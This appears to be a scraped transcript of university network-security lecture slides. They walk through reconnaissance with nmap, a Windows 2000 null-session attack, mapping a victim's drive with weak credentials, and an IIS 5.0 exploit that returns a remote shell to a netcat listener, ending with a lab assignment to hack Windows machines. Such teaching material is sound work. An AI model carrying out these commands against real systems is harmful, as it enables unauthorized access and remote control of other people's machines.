1 / 20

ITP 457 Network Security

ITP 457 Network Security. Network Hacking 101. Hacking Methodology (review). 1. Gather target information 2. Identify services and ports open on the target 3. Research the discovered services for known vulnerabilities 4. Attempt to exploit the services

topper
Download Presentation

ITP 457 Network Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. ITP 457 Network Security Network Hacking 101

  2. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target 3. Research the discovered services for known vulnerabilities 4. Attempt to exploit the services 5. Utilize exploited services to gain additional privileges from the target 6. Reiterate steps 1-5 until goals are achieved

  3. Network Hacking • Methodology changes slightly because we are focused at this point on security from the inside • Gather information & map the network • Scan systems to see what’s alive • Determine services running • Attempt to penetrate the systems (if you want )

  4. Gathering Information • Upon connection to the network • Check your IP – normally automatically assigned • Windows – ipconfig • Linux – ifconfig

  5. Useful information from ipconfig • Physical Address – your computer’s MAC address • IPAddress – the ip address assigned to your computer • Subnet Mask – the mask used to limit the number of computers on the network • Default gateway – the computer that is used to connect to ip addresses outside of the network • DHCP server – the computer that distributes IP addresses • DNS servers – the computer that translates domain names to IP addresses • IPconfig will identify between 1 and 3 computers without any scanning! (DHCP, DNS, Gateway)

  6. “Knock-knock” • Ping sweep • Ping – ICMP “echo request” packets • Will return if host is reachable (alive) • Single command: ping host • Host can be an IP or a domain name (e.g. www.google.com) • We want to see all the hosts on our particular network • Nmap (or Umit) • nmap –sP <target range>

  7. Ping sweep vs. port scanning • Why not start with port scanning? • Normally, ping scanning is benign and will not get you in trouble or caught • Port scanning is almost always seen as malicious • Limit the amount of time that you are port scanning by just looking at systems that are alive • Also, there may be multiple subnets (multiple parts of the network), with some not being occupied. A ping sweep will quickly determine if a particular IP range is up or not.

  8. Determine Running Systems • Portscan the system that you want to break into • Nmap will give a great report, including port service numbers  very useful for determining what is vulnerable • Nmap will also try to tell you what operating system they are running • Is it always reliable?

  9. Breaking in  • Once you’ve discovered what services are running, you have to see which are vulnerable • Determine which service you want to break, and find a vulnerability • Places to look: www.securityfocus.com

  10. Null Session Hack • One of the oldest tricks for Windows 2000 • Will allow any hard disk mounted in the Win2k machine to be mapped as a network drive on the hacker’s machine • Utilizes a vulnerability in the SMB shares • First, determine the IP address of the Windows 2000 machine • Example: 192.168.0.106

  11. Null Session Hack Cont’d • Establish the null session net use \\ipaddress\ipc$ “” /u:”” • This command establishes the null session connection

  12. Get the list of the usernames • The program Dumpsec will give you the usernames and a whole lot more http://www.somarsoft.com/cgi-bin/download.pl?DumpAcl • Go to select computer, and enter the computer address • Go to “Dump Users as Column”, and it will give you options to add more information to the report

  13. DumpSec

  14. Map the network drive • The command “net use” can also be used to map the victim’s machine as a network drive on your computer • Caveat: you must know an adminstrator’s username and password • In our case, the user “Bob” does not have a password – typical for insecure computers • Another common one: username “Administrator” password “Password” • The command:net use Z: \\192.168.0.106\c$ “password” /u:”username”

  15. Golly!

  16. We want more! • We’ve established a remote drive connection, but we cannot run any commands • We need either a remote shell (windows command prompt) or a remote window (VNC or terminal services) • Shell is easier, and does not require a lot of bandwidth

  17. Remember the portscanning • IIS was installed • Version 5.0 • So let’s take a look and see what’s available • http://www.securityfocus.com/bid/2674/info • Download IIS5hack from the exploit section • You will also need netcathttp://www.vulnwatch.org/netcat/nc111nt.zip Use the command: nc –l –p 1111 Tells netcat to listen on port 1111

  18. The hack! • With netcat running, open another command prompt, and enter the command: iis5hack.exe victim-ip your-ip port-number example: iis5hack.exe 192.168.0.106 192.168.0.100 1111 • This will open up a remote shell in the netcat window • MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF!!!

  19. What have you learned? • Methodology of a hack • How to remotely map a drive from a windows 2000 machine • How to hack IIS 5.0

  20. Your lab • Find another way to hack into a Windows 2000 machine • Find a way to hack into the Windows XP SP0 machine • Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?

More Related